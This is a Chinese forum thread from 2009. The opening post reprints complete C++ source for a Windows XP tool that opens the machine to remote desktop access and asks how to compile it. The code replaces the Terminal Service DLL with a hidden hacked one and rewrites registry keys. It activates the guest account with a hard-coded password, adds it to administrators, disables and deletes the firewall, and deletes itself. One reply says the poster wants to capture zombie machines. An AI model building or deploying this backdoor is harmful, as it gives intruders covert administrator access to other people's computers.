Board logo

标题: 请教“xp下双开3389源码”如何编译?用什么软件? [打印本页]

作者: 别克子弹头    时间: 2009-6-4 10:06     标题: 请教“xp下双开3389源码”如何编译?用什么软件?

我不会编程,但很想知道,也很想学习,该文章如下“xp下双开3389源码
编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组
并且可以多用户登录
声明,原创………………..
// xp3389.cpp : XP下双开3389的工具 Code By CoolDiyer//#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW"#include "stdafx.h"#include "resource.h"#include #include DWORDGetProcessId(LPCTSTR szProcName){PROCESSENTRY32 pe;DWORD dwPid;DWORD dwRet;BOOL bFound = FALSE;HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hSP){  pe.dwSize = sizeof( pe );  for (dwRet = Process32First(hSP, &pe);  dwRet;  dwRet = Process32Next(hSP, &pe))  {   if (lstrcmpi( szProcName, pe.szExeFile) == 0)   {    dwPid = pe.th32ProcessID;    bFound = TRUE;    break;   }  }  CloseHandle(hSP);  if (bFound == TRUE)  {   return dwPid;  }}return NULL;}bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam){if (!IsWindowVisible(hwnd))  return true;DWORD dwWindowThreadId = NULL;DWORD  dwLsassId = (DWORD)lParam;GetWindowThreadProcessId(hwnd, &dwWindowThreadId);if (dwWindowThreadId == (DWORD)lParam){  // 关闭指定进程的窗口  SendMessage(hwnd, WM_CLOSE, 0, 0);}return true;}// 写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项) from NameLess114int WriteRegEx(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char* szData, DWORD dwData, int Mode){HKEY  hKey;DWORD dwDisposition;int   iResult =0;__try{  // SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);  switch(Mode)  {  case 0:   if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS)    __leave;  case 1:   if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)    __leave;   switch(Type)   {   case REG_SZ:   case REG_EXPAND_SZ:    if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1) == ERROR_SUCCESS)     iResult =1;    break;   case REG_DWORD:                if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS)     iResult =1;    break;   case REG_BINARY:    break;   }   break;   case 2:    if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)     __leave;    if (RegDeleteKey(hKey,Vname) == ERROR_SUCCESS)     iResult =1;    break;   case 3:    if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)     __leave;    if (RegDeleteValue(hKey,Vname) == ERROR_SUCCESS)     iResult =1;    break;  }}__finally{  RegCloseKey(MainKey);  RegCloseKey(hKey);}return iResult;}bool DebugPrivilege(const char *PName, BOOL bEnable){BOOL              bResult = TRUE;HANDLE            hToken;TOKEN_PRIVILEGES  TokenPrivileges;if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)){  bResult = FALSE;  return bResult;}TokenPrivileges.PrivilegeCount = 1;TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid);AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);    if (GetLastError() != ERROR_SUCCESS){  bResult = FALSE;}CloseHandle(hToken);return bResult;}bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle){HANDLE hRemoteThread;HANDLE hProcess;if (hModuleHandle == NULL)  return false;hProcess=::OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessID);if (hProcess == NULL)  return false;HMODULE hModule=::GetModuleHandle(”kernel32.dll”);LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, “FreeLibrary”);hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);if(hRemoteThread==NULL){  ::CloseHandle(hProcess);  return false;}::WaitForSingleObject(hRemoteThread,INFINITE);::CloseHandle(hProcess);::CloseHandle(hRemoteThread);return true;}HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath){HANDLE hModuleHandle = NULL;MODULEENTRY32 me32={0};HANDLE hModuleSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID);me32.dwSize=sizeof(MODULEENTRY32);if(::Module32First(hModuleSnap, &me32)){  do  {   if (!lstrcmpi(me32.szExePath, lpModulePath))   {    hModuleHandle = me32.hModule;    break;   }  }while(::Module32Next(hModuleSnap,&me32));}::CloseHandle(hModuleSnap);return hModuleHandle;}bool UnloadModule(LPCTSTR lpModulePath){BOOL bRet = false;PROCESSENTRY32 pe32;pe32.dwSize = sizeof(pe32);HANDLE hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//查找相关的进程if(:rocess32First(hProcessSnap, &pe32)){  do  {   HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);   if (hModuleHandle != NULL)   {    bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);   }  }while (Process32Next(hProcessSnap,&pe32));}CloseHandle(hProcessSnap);return bRet;}void StartService(LPCTSTR lpService){SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE );if ( NULL != hSCManager ){  SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);  if ( NULL != hService )  {   StartService(hService, 0, NULL);   CloseServiceHandle( hService );  }  CloseServiceHandle( hSCManager );}}BOOL ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName){HGLOBAL hRes;HRSRC hResInfo;HANDLE hFile;DWORD dwBytes;hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);if (hResInfo == NULL)  return FALSE;hRes = LoadResource(NULL, hResInfo);if (hRes == NULL)  return FALSE;hFile = CreateFile  (  lpFileName,  GENERIC_WRITE,  FILE_SHARE_WRITE,  NULL,  CREATE_ALWAYS,  FILE_ATTRIBUTE_NORMAL,  NULL  );if (hFile == NULL)  return FALSE;WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);CloseHandle(hFile);return TRUE;}void SetReg(){WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Services\\TermService”,”Start”,REG_DWORD,NULL,2,0);WriteRegEx(HKEY_LOCAL_MACHINE, “SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”, “KeepRASConnections”, REG_SZ, “1″, 0, 0);WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Control\\Terminal Server”, “fDenyTSConnections”, REG_DWORD, NULL, 0, 0);WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core”, “EnableConcurrentSessions”,  REG_DWORD, NULL, 1, 0);WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters”, “ServiceDll”, REG_EXPAND_SZ,  “%SystemRoot%\\system32\\termsrvhack.dll”, 0, 0);}void ReleaseDll(){char strSystemPath[MAX_PATH];char strDllcachePath[MAX_PATH];GetSystemDirectory(strSystemPath, sizeof(strSystemPath));GetSystemDirectory(strDllcachePath, sizeof(strDllcachePath));lstrcat(strSystemPath, “\\termsrvhack.dll”);lstrcat(strDllcachePath, “\\dllcache\\termsrvhack.dll”);ReleaseResource(IDR_DLL, “BIN”, strSystemPath);ReleaseResource(IDR_DLL, “BIN”, strDllcachePath);SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);SetFileAttributes(strDllcachePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);}bool IsOSXP(){OSVERSIONINFOEX OsVerInfoEx;OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);GetVersionEx((OSVERSIONINFO *)&OsVerInfoEx); // 注意转换类型return OsVerInfoEx.dwMajorVersion == 5 && OsVerInfoEx.dwMinorVersion == 1;}void HijackService(){char strDll[MAX_PATH];GetSystemDirectory(strDll, sizeof(strDll));lstrcat(strDll, “\\termsrv.dll”);// 释放termsrvhack.dllReleaseDll();// 遍历进程卸载现在加载的DLLDebugPrivilege(SE_DEBUG_NAME, TRUE);if (!UnloadModule(strDll))  return;DebugPrivilege(SE_DEBUG_NAME, FALSE);// 关闭要弹出的出错对话框和因DLL强制卸载使一些服务异常终止而弹出来的自动关机对话框// 对进程赋予关闭权限DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);DWORD dwLsassId = GetProcessId(”csrss.exe”);while (!AbortSystemShutdown(NULL)){  // 一些系统是会弹出drwtsn32.exe  DWORD dwDrwtsn32Id = GetProcessId(”drwtsn32.exe”);  if (dwDrwtsn32Id != NULL)  {   EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwDrwtsn32Id);  }  // 模块强制卸载时会出错,关闭csrss.exe进程弹出的出错窗口  EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwLsassId);  Sleep(10);}DebugPrivilege(SE_SHUTDOWN_NAME, FALSE);}int WINAPI WinMain(       HINSTANCE hInstance,      // handle to current instance       HINSTANCE hPrevInstance,  // handle to previous instance       LPSTR lpCmdLine,          // command line       int nCmdShow              // show state       ){// 一些注册表的操作SetReg();if (IsOSXP()){  // 替换DLL  HijackService();}// 开始终端服务StartService(”TermService”);// 激活guest,加管理员组,自删除,停止XP自带的防火墙,并删除它char strCommand[1024];char strSelf[MAX_PATH];GetModuleFileName(NULL, strSelf, sizeof(strSelf));wsprintf(strCommand, “cmd.exe /c net user guest /active:yes && net user guest cooldiyer && net localgroup administrators guest /add && net stop SharedAccess /y && del \”%s\” && sc delete SharedAccess”, strSelf);WinExec(strCommand, SW_HIDE);return 0;}

作者: 别克子弹头    时间: 2009-6-5 15:04

沙发自己做  期待高手的回复
作者: xiaogu    时间: 2009-6-5 15:24

你会CMD不,会不会瑞士军刀
作者: 别克子弹头    时间: 2009-6-6 11:40

我就想知道上面的源码如何编译,三楼的老师可否说的细致一点。我給你大大的加分
作者: 新视达    时间: 2009-6-7 10:18

楼主是想学抓肉鸡啊!直接运行一些抓鸡程序就行了,用不了这么复杂!
作者: 别克子弹头    时间: 2009-6-8 11:00

高手隐藏的都很深 而且都很低调




欢迎光临 『家电维修论坛 163DZ.COM』 (http://163dz.com./bbs/) Powered by Discuz! 7.0.0